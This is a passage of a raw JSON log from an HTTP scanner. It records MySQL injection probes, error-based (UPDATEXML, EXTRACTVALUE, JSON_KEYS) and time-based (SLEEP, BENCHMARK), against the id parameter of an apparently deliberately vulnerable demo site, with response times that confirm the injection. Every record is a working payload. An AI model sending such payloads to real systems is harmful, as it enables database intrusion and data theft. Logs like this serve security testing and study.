dgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:10.734999974Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20UPDATEXML%288880%2CCONCAT%280x2e%2C0x7178706a71%2C%28SELECT%20%28ELT%288880%3D8880%2C1%29%29%29%2C0x71706b6a71%29%2C3612%29--%20lLkG\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20UPDATEXML%288880%2CCONCAT%280x2e%2C0x7178706a71%2C%28SELECT%20%28ELT%288880%3D8880%2C1%29%29%29%2C0x71706b6a71%29%2C3612%29--%20lLkG\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20UPDATEXML%288880%2CCONCAT%280x2e%2C0x7178706a71%2C%28SELECT%20%28ELT%288880%3D8880%2C1%29%29%29%2C0x71706b6a71%29%2C3612%29--%20lLkG\",\"time\":\"347.127091ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:10.753523506Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%288544%3D8544%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20psTN\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%288544%3D8544%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20psTN\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%288544%3D8544%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20psTN\",\"time\":\"340.230629ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:10.772740365Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%288169%3D8169%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%288169%3D8169%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%288169%3D8169%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"time\":\"347.353073ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:11.497063537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%202289%3DBENCHMARK%285000000%2CMD5%280x626b6e43%29%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%202289%3DBENCHMARK%285000000%2CMD5%280x626b6e43%29%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%202289%3DBENCHMARK%285000000%2CMD5%280x626b6e43%29%29%23\",\"time\":\"435.131125ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:14.69922107Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%204264%3DBENCHMARK%285000000%2CMD5%280x6f7a5776%29%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%204264%3DBENCHMARK%285000000%2CMD5%280x6f7a5776%29%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%204264%3DBENCHMARK%285000000%2CMD5%280x6f7a5776%29%29%23\",\"time\":\"379.817787ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:14.704902341Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%205667%3DBENCHMARK%285000000%2CMD5%280x6e524554%29%29--%20YRTY\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%205667%3DBENCHMARK%285000000%2CMD5%280x6e524554%29%29--%20YRTY\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%205667%3DBENCHMARK%285000000%2CMD5%280x6e524554%29%29--%20YRTY\",\"time\":\"379.496541ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.124634753Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29\",\"time\":\"5.356031913s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.293464605Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%206031%3DBENCHMARK%285000000%2CMD5%280x5a554e6a%29%29--%20mkzI\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%206031%3DBENCHMARK%285000000%2CMD5%280x5a554e6a%29%29--%20mkzI\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%206031%3DBENCHMARK%285000000%2CMD5%280x5a554e6a%29%29--%20mkzI\",\"time\":\"387.004254ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.689581531Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%287847%3D7847%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29x%29%29--%20LxZf\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%287847%3D7847%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29x%29%29--%20LxZf\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%287847%3D7847%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29x%29%29--%20LxZf\",\"time\":\"344.718418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.727704073Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29%23\",\"time\":\"5.347327347s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.731783291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29--%20jlcm\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29--%20jlcm\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20SLEEP%285%29--%20jlcm\",\"time\":\"5.351511484s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.794421154Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202556%20FROM%20%28SELECT%28SLEEP%285%29%29%29YKBO%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202556%20FROM%20%28SELECT%28SLEEP%285%29%29%29YKBO%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20%28SELECT%202556%20FROM%20%28SELECT%28SLEEP%285%29%29%29YKBO%29%23\",\"time\":\"5.353357529s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.810347005Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%203374%20FROM%20%28SELECT%28SLEEP%285%29%29%29PKmc%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%203374%20FROM%20%28SELECT%28SLEEP%285%29%29%29PKmc%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20%28SELECT%203374%20FROM%20%28SELECT%28SLEEP%285%29%29%29PKmc%29%23\",\"time\":\"5.343556318s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.849163738Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%286538%3D6538%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29x%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%286538%3D6538%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29x%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%286538%3D6538%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29x%29%29\",\"time\":\"352.885453ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:15.92411091Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXTRACTVALUE%281946%2CCONCAT%280x5c%2C0x7176716271%2C%28SELECT%20%28ELT%281946%3D1946%2C1%29%29%29%2C0x716b786b71%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXTRACTVALUE%281946%2CCONCAT%280x5c%2C0x7176716271%2C%28SELECT%20%28ELT%281946%3D1946%2C1%29%29%29%2C0x716b786b71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20EXTRACTVALUE%281946%2CCONCAT%280x5c%2C0x7176716271%2C%28SELECT%20%28ELT%281946%3D1946%2C1%29%29%29%2C0x716b786b71%29%29\",\"time\":\"354.8645ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.096060673Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXTRACTVALUE%287907%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28ELT%287907%3D7907%2C1%29%29%29%2C0x71706b6a71%29%29--%20qXvX\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20EXTRACTVALUE%287907%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28ELT%287907%3D7907%2C1%29%29%29%2C0x71706b6a71%29%29--%20qXvX\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20EXTRACTVALUE%287907%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28ELT%287907%3D7907%2C1%29%29%29%2C0x71706b6a71%29%29--%20qXvX\",\"time\":\"346.529138ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.150084896Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20GTID_SUBSET%28CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%288030%3D8030%2C1%29%29%29%2C0x716b7a6271%29%2C8030%29--%20zyJS\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20GTID_SUBSET%28CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%288030%3D8030%2C1%29%29%29%2C0x716b7a6271%29%2C8030%29--%20zyJS\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20GTID_SUBSET%28CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%288030%3D8030%2C1%29%29%29%2C0x716b7a6271%29%2C8030%29--%20zyJS\",\"time\":\"339.272146ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.249141182Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20GTID_SUBSET%28CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%289952%3D9952%2C1%29%29%29%2C0x71706b6a71%29%2C9952%29--%20bkAl\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20GTID_SUBSET%28CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%289952%3D9952%2C1%29%29%29%2C0x71706b6a71%29%2C9952%29--%20bkAl\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20GTID_SUBSET%28CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%289952%3D9952%2C1%29%29%29%2C0x71706b6a71%29%2C9952%29--%20bkAl\",\"time\":\"351.438742ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.284126031Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%284438%3D4438%2C1%29%29%29%2C0x716b7a6271%29%29%20USING%20utf8%29%29%29--%20oGjQ\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%284438%3D4438%2C1%29%29%29%2C0x716b7a6271%29%29%20USING%20utf8%29%29%29--%20oGjQ\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%284438%3D4438%2C1%29%29%29%2C0x716b7a6271%29%29%20USING%20utf8%29%29%29--%20oGjQ\",\"time\":\"352.737121ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.314139895Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%289331%3D9331%2C1%29%29%29%2C0x716b786b71%29%29%20USING%20utf8%29%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%289331%3D9331%2C1%29%29%29%2C0x716b786b71%29%29%20USING%20utf8%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%289331%3D9331%2C1%29%29%29%2C0x716b786b71%29%29%20USING%20utf8%29%29%29\",\"time\":\"357.453072ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.355150055Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%205197%20FROM%20%28SELECT%28SLEEP%285%29%29%29LxuB%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20%28SELECT%205197%20FROM%20%28SELECT%28SLEEP%285%29%29%29LxuB%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20%28SELECT%205197%20FROM%20%28SELECT%28SLEEP%285%29%29%29LxuB%29%23\",\"time\":\"5.344619566s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.568985437Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%281364%3D1364%2C1%29%29%29%2C0x71706b6a71%29%29%20USING%20utf8%29%29%29--%20oDMv\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%281364%3D1364%2C1%29%29%29%2C0x71706b6a71%29%29%20USING%20utf8%29%29%29--%20oDMv\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%281364%3D1364%2C1%29%29%29%2C0x71706b6a71%29%29%20USING%20utf8%29%29%29--%20oDMv\",\"time\":\"352.067235ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.629479173Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20ROW%289777%2C8926%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289777%3D9777%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203911%20UNION%20SELECT%202804%20UNION%20SELECT%206270%20UNION%20SELECT%206446%29a%20GROUP%20BY%20x%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20ROW%289777%2C8926%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289777%3D9777%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203911%20UNION%20SELECT%202804%20UNION%20SELECT%206270%20UNION%20SELECT%206446%29a%20GROUP%20BY%20x%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20ROW%289777%2C8926%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289777%3D9777%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203911%20UNION%20SELECT%202804%20UNION%20SELECT%206270%20UNION%20SELECT%206446%29a%20GROUP%20BY%20x%29\",\"time\":\"352.69304ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":26,\"lines\":6,\"status_code\":200,\"content_length\":244,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.635077634Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20UPDATEXML%281889%2CCONCAT%280x2e%2C0x7162787a71%2C%28SELECT%20%28ELT%281889%3D1889%2C1%29%29%29%2C0x716b7a6271%29%2C3280%29--%20tLDQ\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20UPDATEXML%281889%2CCONCAT%280x2e%2C0x7162787a71%2C%28SELECT%20%28ELT%281889%3D1889%2C1%29%29%29%2C0x716b7a6271%29%2C3280%29--%20tLDQ\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20OR%20UPDATEXML%281889%2CCONCAT%280x2e%2C0x7162787a71%2C%28SELECT%20%28ELT%281889%3D1889%2C1%29%29%29%2C0x716b7a6271%29%2C3280%29--%20tLDQ\",\"time\":\"343.374873ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Ng